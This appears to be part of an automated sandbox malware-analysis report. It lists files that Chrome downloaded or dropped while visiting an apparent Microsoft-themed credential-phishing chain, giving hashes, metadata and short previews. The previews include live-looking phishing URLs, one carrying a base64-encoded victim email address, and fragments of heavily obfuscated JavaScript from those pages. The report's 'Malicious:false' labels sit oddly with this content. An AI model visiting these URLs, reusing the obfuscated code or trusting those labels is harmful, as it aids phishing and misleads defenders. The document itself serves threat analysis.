                                      Preview:L..................F.@.. ...$+.,....3...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VdZS......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 4 15:10:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2679
                                      Entropy (8bit):3.979103100996675
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:24372C215747FA0879CE75508F232B97
                                      SHA1:2954FF4B3D33A0C21DF6E4B2F5EFCEA9CA1B803D
                                      SHA-256:3A3E671A735BA046C0211BD645D9CABC050A2C75FFB1B0B858B6FE84880017DC
                                      SHA-512:F4E89D171F8DB45622EDB72456CE43E7611481AD83FAD2E178634460759AAB9C2AA990DFD7B1DAA5C4229916DC6213F8F4C742C37C5C9C26F8BD383C89E35E24
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....US..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VdZS......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 4 15:10:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2681
                                      Entropy (8bit):3.9954292089045516
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:82D583EF5DCB119121191FDE2A0BDA3D
                                      SHA1:50EA8EDD1020EEDD2CE17A325779DB84B753EB8F
                                      SHA-256:7AA50A456DE2BF52F73DF43819209C22C9616FB8BA63440604698CCC79D9DD5C
                                      SHA-512:B1E3C276775ABD1F57C6BDFF8696A487757B4B8A7DDC966F465B4BBCB005CEEC58FB72CE9FF1881EEFE1A9B6ACCBC94E19AAFE3E3BDB4AEAA520A9BB73551307
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VdZS......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (2877)
                                      Category:downloaded
                                      Size (bytes):4113
                                      Entropy (8bit):5.312392547180215
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C2959B0221AFEB30FBD5EAFB86FB3FB5
                                      SHA1:E857B89A62C1EC2245BAF51D535AD8B3AF7BAAC0
                                      SHA-256:638684131A3AD09B62D819E5F0113A3E04D7E2FB8133754A6648BCAB12CC08E0
                                      SHA-512:B40273AE375CF9330C5BF1A0697DF74F26734924B58652EEB3D663EC2A90D5B6F9A9821443F2C4007178512E9A959D13AD719C96A08C9F18B2A8725A5F74D833
                                      Malicious:false
                                      Reputation:unknown
                                      URL:"https://coxuongkhopbariavungtau.com/attach,loading.htm"
                                      Preview:.<html>. <head>. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <meta name="robots" content="noindex, nofollow">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#courageous {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#spoke {width: 130px;margin-top: 179px;}#strive {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#strive>.tomato {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#strive>.elation {width: 287px;height: 71px;background: #1388d6;transform: translate(-120px, 63px) rotate(-28deg);}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3840x2160, components 3
                                      Category:downloaded
                                      Size (bytes):56944
                                      Entropy (8bit):5.7646986679207926
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1D37C98577514CF3E46E1298A632DFBA
                                      SHA1:14DD0966C80A0E3E3F864555464AFB7D12E3A293
                                      SHA-256:BA42A91B2F5EB8C87CE8A4C7EEBE021BB73DC4E6C66C3AFE597A9E739208BED7
                                      SHA-512:DF00492D0DDA350AA633C93D939ED0255F6856BE48CF7750F465765976DCAD41F0E622744096455B54025B621CD44F7E29B49677FBB5733266BC93CA84F26964
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/microsoft.jpg
                                      Preview:......JFIF..........................................................-. .". .". .-.D.*.2.*.*.2.*.D.<.I.;.7.;.I.<.l.U.K.K.U.l.}.i.c.i.}...................N............................................-. .". .". .-.D.*.2.*.*.2.*.D.<.I.;.7.;.I.<.l.U.K.K.U.l.}.i.c.i.}...................N......p...."..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (612), with no line terminators
                                      Category:downloaded
                                      Size (bytes):612
                                      Entropy (8bit):4.946766275274378
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0637605D83D35A33BF15BD0EA4F780AB
                                      SHA1:A5362A0B0447AEFFF4345D62637B74F95F84958B
                                      SHA-256:4DF61D80C041AF80DE45A8C7B05915B2598585D93E9B8004DC87E6B4D4819CC0
                                      SHA-512:9E26B535E10AEA91B32D185E62F38F2245287D7E250766783D86DDA3DCBCF12C953A38B5DBFBDD58345324843D2FB29362A054683E09C1955254B04DBD27D5B0
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/_next/static/css/f796ea3b426fcf90.css
                                      Preview:.loader,.loading-dots{display:flex;justify-content:center;align-items:center}.loader{width:100%;height:2rem;margin-top:-1rem;margin-bottom:.5rem}.dot{width:.5rem;height:.5rem;background-color:#3b82f6;border-radius:50%;margin:0 .25rem;animation:pulse 1s ease-in-out infinite}@keyframes pulse{0%{transform:scale(.8);opacity:.5}50%{transform:scale(1.2);opacity:1}to{transform:scale(.8);opacity:.5}}@keyframes dot-flashing{0%{opacity:.3}50%,to{opacity:1}}@keyframes loading-bar{0%{width:0;margin-left:0}50%{width:100%;margin-left:0}to{width:0;margin-left:100%}}.animate-loading-bar{animation:loading-bar 2s infinite}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):3.990210155325004
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):11995
                                      Entropy (8bit):7.782017948236843
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F33981A90FE15785A8926E3C0C3025F3
                                      SHA1:4134711FBEB0623B0905D7D883DF5DFC8EBB63B0
                                      SHA-256:A03EF94AA889E84A57C33D4493EA2EB9AA53B1CFCECC814BF387F26053746371
                                      SHA-512:B05575A76005FA8991A605E2638C978EB08A9952ECA9C3BFDF2F262549963D71412048754DBF1EFB996F74E7A619AC8842FC6569B2959181D447E56C1EF7E447
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR.............}......pHYs............... .IDATx..yx....Z[mhA....@.1...\mOO.p.t.Sk..Vk..:V..j...%...D..2. .."...!...2... 32..|.5~..E.{..y.{.....|..~..w.X.....................................................................................................................................................................................................................................o6*..'..lBN.|EN.|[..r!..5....~...oq.F..w..kZ(.E.,.jNqy.D.r..A..j...........r. &'.$.j.(.H.C|.@dj`CN.+..?M.@....;-'Q>.@3 ..5.P.9.e........ .....-.%.......h.@N..S.,?....%........'..5`..r....jQy..0.K.+=.Qq.b..<a...s5.(........S\.....0....H.?A..p@..'.......0....H......;4`...S\>W..N..j.t..$...|.2H....K..M..j $5P.....2%.D....5a...P.@NqY... ...}_.)....&..5....I.m.]6.$.0@.|.GO~K..M..j \5p*.7..O......1..BW......+....~.1..BT.9..Gi..i.S\>@..L..j \5..({....&......1..BV....4_.....c...H `..a.l.... l5.@...X.... .5.@...X.... .5.@...X.... .5.@...X.... .5.@...X.... .5.@...X.... .5.@..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows icon resource - 9 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                      Category:downloaded
                                      Size (bytes):163706
                                      Entropy (8bit):3.011625165688973
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0F2307B0E63B55E71BF66695670E634D
                                      SHA1:9FDE22A5598C81E0CA3903CE7DF47F77A1AE4D19
                                      SHA-256:9A2F494181DCB5F7A5DB72BBD94D63510330D53E8E85FC5B8C5D87A6D4FDD7BC
                                      SHA-512:D0797B4353475E2AE20C5331BFFFDFDC84B8E72297109198338FB5E49208B73A5E2636D2294FF227161BDB906AB31BF1C912B5068F88296D6AF865D75D6D5515
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/favicon.ico
                                      Preview:............ .h............. ......... .... .........00.... ..%......@@.... .(B...D..HH.... ..T......``.... ............... .(....p........ .$...Vx..(....... ..... ........................................................................................................................................................................................L...L...........................................................V...V...........................................................V...V...........................................................V...V...........................................................U...U.......................................L...V...V...V...U...........U...V...V...V...L.........S...S...S.L.S.V.S.V.S.V.S.U.N..W.8.T.CUT.CVT.CVT.CVT.CLT.C.T.C."W.."W.."W.."W.."W.."W.."W.. R.UR.CUP.L.P.L.P.L.P.L.P.L.P.L.P.L."W.."W.."W.."W.."W.."W.."W.. R.VR.CVP.L.P.L.P.L.P.L.P.L.P.L.P.L."W.."W.."W.."W.."W.."W.."W.. R.VR.CVP.L.P.L.P.L.P.L.P.L.P.L.P.L."W.."W.."W.."W.."W.."W.."W.. R.VR.CVP.L.P.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 45 x 56, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):4.035372245524405
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:08C165FA50BC8C26E12FD711DDB10C1A
                                      SHA1:4559948CC022EE1F5730ABA73B75552C2BD16A0E
                                      SHA-256:38CB1CB8EE3EF883C7AD8C4596F192544CC9F593A47A8EDB845A1C0C3C32AF09
                                      SHA-512:BAC46CC05821966FCAF8A95B814F2B1C11020F3FE1E0E4E23BFEA3E1F1BF16B197111D10CD5AFA3F9E90A004A570E07926FE4DC71F4F8FFB427A842263FD2ABD
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/91b2a5278a73180d/1741104643151/Mii058oQqjPbOGW
                                      Preview:.PNG........IHDR...-...8......c......IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Web Open Font Format (Version 2), TrueType, length 48556, version 1.0
                                      Category:downloaded
                                      Size (bytes):48556
                                      Entropy (8bit):7.995696058489687
                                      Encrypted:true
                                      SSDEEP:
                                      MD5:D4FE31E6A2AEBC06B8D6E558C9141119
                                      SHA1:BCDC4F0B431D4C8065A83BB736C56FF6494D0091
                                      SHA-256:C88DB2401BEF7E1203E0933CC5525A0F81863BFD076756DB12ACEA5596F089EC
                                      SHA-512:1CBE7641B8930163ED3EA348F573CAD438B646ED64D60C1923E5B8664C3DE9C2C21BA97994EC8D886F489E4D090772B010DE72A1167547FB4F6A2D242D46AEC1
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/_next/static/media/a34f9d1faa5f3315.p.woff2
                                      Preview:wOF2...............T...2..........................`...\..p?HVAR.m?MVAR^.`?STAT.N'&..>/l........>....0....6.$.... ......[..q.u...y..9....BB...!&/..........>.....vP..........&.2..z....e}/.(...C.,..n&.....g......d.....\...\..3.L..8<v8...............^9K.{+.Y...n.S.......J..i...@.S.t..-.5_..B*...(W5.......L.q.....d7..... .T....h;}.V....bCm.....;...?.V..zB.%d...UR%U.nZ..%R..Q=W1e-.xs.p!..v.tY...^......."..%...Q.>B..O~.u.$..Jm........l....4].Yr..<..T{.fv.8PJ.] <9%8...Q......<............&i.&$$..-..M%eB..~..K.&I.e..$I%........s...{{]Wn...s. .H.dH....$...6`0...c.1j..X. i``.J....f_.y...m.?.``%F..'X.v...Z..2V.l.20.h.!..`.*.O....)w....~. X.....!Z....u.....I.Z%..R.A.0.w....]....Z.$'!.i......?./...?....L.....R..[.+.....Y.....G...5Ds.l..U.*...&..L.......C..."...Z..m.Qu._~`...t.....Q...;.vk..U;m,DD..E....v./..\....O....".M]!.^D....H....~.J..iN?...:`99/..a......{p..O'..B%.. .@b.x.(..i3.ry...^.i..I..E.g....r..{Tb.......&8M6.L.f.E..pS.....|.Z4.....`.]?.T..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (23844), with no line terminators
                                      Category:dropped
                                      Size (bytes):23844
                                      Entropy (8bit):5.56256336237712
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9CB1479CF3E04E6B4B8E3F15F306049B
                                      SHA1:56ACBE96B47697BB734B6B8A0B40E35EE740BD6B
                                      SHA-256:FE3C88DA0EDDC6A512F312ED15F3455B91854D415CE2958F0B88DC0768AB4C2B
                                      SHA-512:2B0B0D16950FE98C3BFB792C7FDB9416CA5D965B8582DD429744BD667F543672A217260F28A8CA165A55F78A7C326574D4EA0D1F1C38C000E0B4A719505085BE
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:var a4_0x2ae60a=a4_0x58c7,a4_0x481edc=a4_0x3437;(function(_0x2018ff,_0x4cc992){var _0x4d8352=a4_0x3437,_0x113735=a4_0x58c7,_0x37c30e=_0x2018ff();while(!![]){try{var _0xcfb247=parseInt(_0x113735(0x135))/(0x21*-0xde+-0x254a+-0x1*-0x41e9)*(parseInt(_0x113735(0x1aa))/(0x26*-0x5c+0x2043*0x1+0xcf*-0x17))+-parseInt(_0x4d8352(0x143,'6320'))/(-0x145a+0x1215+0x248*0x1)*(parseInt(_0x113735(0x12b))/(-0x1465+0x7d4+-0x1*-0xc95))+-parseInt(_0x113735(0x157))/(-0x1*0x18be+-0x53*0x17+0x101c*0x2)*(-parseInt(_0x4d8352(0x15a,'C5(^'))/(0x1c81+-0x64e+0x162d*-0x1))+-parseInt(_0x113735(0x164))/(-0x2523+0x1a*0x17d+-0x2*0xc4)+-parseInt(_0x4d8352(0x127,'qPfd'))/(0x1396+0x23*-0x96+-0x3d*-0x4)+parseInt(_0x4d8352(0x15b,'OBo^'))/(0x1cee+-0x3*-0x1af+-0x21f2)+-parseInt(_0x4d8352(0x129,'$EL*'))/(0xf68+-0x1a*-0x67+-0x15c*0x13)*(-parseInt(_0x113735(0x1ad))/(0x3*-0x332+-0x1*-0x1002+-0x661));if(_0xcfb247===_0x4cc992)break;else _0x37c30e['push'](_0x37c30e['shift']());}catch(_0xd9be49){_0x37c30e['push'](_0x37c30e['shift']());
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):258862
                                      Entropy (8bit):5.585692324762129
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F709DF052F255DB5328D8C5558981E4E
                                      SHA1:6754471EAA5FE70E8C9195062790E7989F42C4B1
                                      SHA-256:0B965C15BCD680E874D8F13F038A3031140017859612D54D399EFFA9A372257A
                                      SHA-512:0A3228C4767EAE39905A82DFAA6EFD87ED1364161F9D43C3349561885902DF219046E8AD6BD38B013F3D6408EDB7AEC529C9511E666E58B294BA2EEDF727B51D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:const a8_0x196b6c=a8_0x23e1,a8_0x55314b=a8_0x5d3b;(function(_0x33e961,_0x396282){const _0x41a359=a8_0x23e1,_0x1e3274=a8_0x5d3b,_0x1156c5=_0x33e961();while(!![]){try{const _0xe269fe=parseInt(_0x1e3274(0xa36,'lzok'))/(0x2*0x12e6+-0x12ae+-0x131d)+-parseInt(_0x41a359(0x28b))/(0x7*0x593+0x15fd+-0xf4*0x40)+parseInt(_0x41a359(0x4ac))/(-0x9a3*0x3+-0xb57+0x3a9*0xb)+parseInt(_0x1e3274(0x807,'E4uN'))/(-0x123b+0x5f*0x49+0x46c*-0x2)*(parseInt(_0x1e3274(0xc16,'mAfn'))/(-0xdd2+-0x438+0x120f))+parseInt(_0x41a359(0x41b))/(0x1b87+0x15a*0x8+-0x2651)+parseInt(_0x41a359(0x199))/(-0x26ff+0x12ee+0x1418)+-parseInt(_0x41a359(0x461))/(0xd*-0xcd+-0xdb9*0x2+0xca1*0x3);if(_0xe269fe===_0x396282)break;else _0x1156c5['push'](_0x1156c5['shift']());}catch(_0xc4abed){_0x1156c5['push'](_0x1156c5['shift']());}}}(a8_0x332a,-0x7c*-0x23b4+-0xc755c+0x47987));function a8_0x332a(){const _0x2ea30e=['WPb8W5ZcL8ktW4j2WPNdOra','uu9Tq20','zMfqCM9VzNm','u1zpsMm','zhf6AwW','ystcKSoCAa','Dg9tDhjPBMC','W57cV8o7W7zF','qZhdQ8k2W6u','qu3dO
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):791194
                                      Entropy (8bit):5.494689298421771
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:954F057451B51D121A3AFCCA095B973D
                                      SHA1:5FE256CF1DC2C2C4EB287FD94FFEF41C7ACEFB7E
                                      SHA-256:2EB67AC83E970403EFD6BE70085BB7E3A799DB501BE79939C0D04C803B10B0BF
                                      SHA-512:6740510D7FC6C4C60E1143B29FB6C1B1CFE7FE7AFFBAE7706A537E0010E9680A1EAA37D83EF927C59B2B731A7D417D36390ACF26900A93D6DACBDAC934CB7C34
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/_next/static/chunks/23-5e92960ee97bfa6f.js
                                      Preview:const a12_0x2fe4ec=a12_0x57bf;(function(_0x1e5f18,_0x219398){const _0x133a68=a12_0x57bf,_0x1928d2=a12_0x6071,_0x44e584=_0x1e5f18();while(!![]){try{const _0x3efea3=-parseInt(_0x1928d2(0xcd3))/(0x3*0x1e+0x84*-0x16+0xaff)*(-parseInt(_0x133a68(0x185d,'nge$'))/(-0x1*0x1039+-0x1183+0x21be))+-parseInt(_0x133a68(0x1664,'Akzp'))/(0x2a0+0x11c1+-0x145e)*(parseInt(_0x1928d2(0xdfc))/(-0x1f44+-0xb*-0x2ff+0x21*-0xd))+-parseInt(_0x1928d2(0x35d))/(-0x2*-0xe8f+0x1*-0x322+-0x121*0x17)*(parseInt(_0x133a68(0x13e7,'PCZQ'))/(0x2501+0x1fd5+0xc*-0x5bc))+-parseInt(_0x1928d2(0x5b8))/(0x1438+-0x160d+0x1dc)+-parseInt(_0x1928d2(0xd10))/(0x1ad6+0x11bc+-0x2c8a)*(-parseInt(_0x133a68(0x9f3,'EBDM'))/(-0x17f7+0xc3a*0x2+-0x74))+parseInt(_0x1928d2(0xe49))/(0x262d+-0xaab*0x1+-0x1b78)+parseInt(_0x1928d2(0x1f2))/(0x14b*0x1+0xb99*0x1+-0xfd*0xd);if(_0x3efea3===_0x219398)break;else _0x44e584['push'](_0x44e584['shift']());}catch(_0xfe283b){_0x44e584['push'](_0x44e584['shift']());}}}(a12_0xbff6,0xf1805*-0x1+0x48d*-0x277+0x22149d))
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48238)
                                      Category:downloaded
                                      Size (bytes):48239
                                      Entropy (8bit):5.343270713163753
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:184E29DE57C67BC329C650F294847C16
                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65498), with no line terminators
                                      Category:downloaded
                                      Size (bytes):710790
                                      Entropy (8bit):4.792674742752833
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:BB649CA26573B491F758704AA9B566D7
                                      SHA1:BAF0C3946C20947F6EA2111301BF4311C32BAAE5
                                      SHA-256:09774B2A818D8B1E4AFEF713872D817810107ECAC3AD45697C6623B8B0D2CBAF
                                      SHA-512:EE67423CA47203D1D104D673122A43A7B9E859644327DC3A99CCC289889C7D8EE37DD7737B50E87312DC43DA2F4A099B42841A06E30E3C9B705930629E2AD8CD
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://secureonlineauthenticate.awbpartners.com.au/site.php?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==
                                      Preview:<script>;Function("'@f1[2@6}2t4*l8ew_vpfg+94ymsh~qy&h6wy-e5ek8.^me%vn27nfez4}c*efus%,u_fp]7&e6g%y@lr!42^a@ipg&l.&zjf-q%y3wf&1r6]1t5t.pzsk+.[8iu5qtjq^y9o7]25t&rg9{[9tih_en3xxh[1f[@a8te5uqe}a!]4%l@3o9k_6}6ol]q!o7},6sxv3a,9em]f~~1aj+il9-v~4[t6g57^u7+_s}5za+jl!o}gj%s^{wcz-p#*&wk^er3r.g!5s1cjma+ly{ee#!im6x#3!_k#1x-8.q^**^jsuj!vgv#*83i@z{-r}no}-ww2[c_*im}ep9z[3q%.u#,6~z]e,3_.ghcv#7h.q^n*[~xn3nm&2ho218pmnh%r*4^e1_9qly9%iwa78une+xjp~a+v{lmn!,-ec&4#p[]&@#ka2,4,_oj.5x1~ghyfeu4+*zx%m]px{8@r~7wo-o{cs{vr{c#k{skk,zk]5i,ctrvyh-!@tu8+72~icw';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?\"0QsupcVnlVictmeF\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,\"\"):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?\"JVfpomwrwvEVXax6c41mhp\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,\"\"):\"ZrFSMsuJnpgc054tUijoIMnUYg\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,\"\"));_QTW7v07E7O88q9h34
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1366x768, components 3
                                      Category:dropped
                                      Size (bytes):85552
                                      Entropy (8bit):7.96655778727101
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:4743EA1E43EBADF7D8A16D2B44C5839B
                                      SHA1:9661A36EB3D72FB34237BDD9CDD5275039959CB0
                                      SHA-256:5CD555E9884B078121D2240EDCF1D568F56FA061EB87244864EA44557F1F9F7D
                                      SHA-512:617C5188ABCB28EF05B32983137B18CF54E7ABE5259ADCBF928B553BDFBA3B5010B7E0B7B79C4BDAD75ED68564C52075D9BEA814F2A20FD77961753A92B61F65
                                      Malicious:false
                                      Reputation:unknown
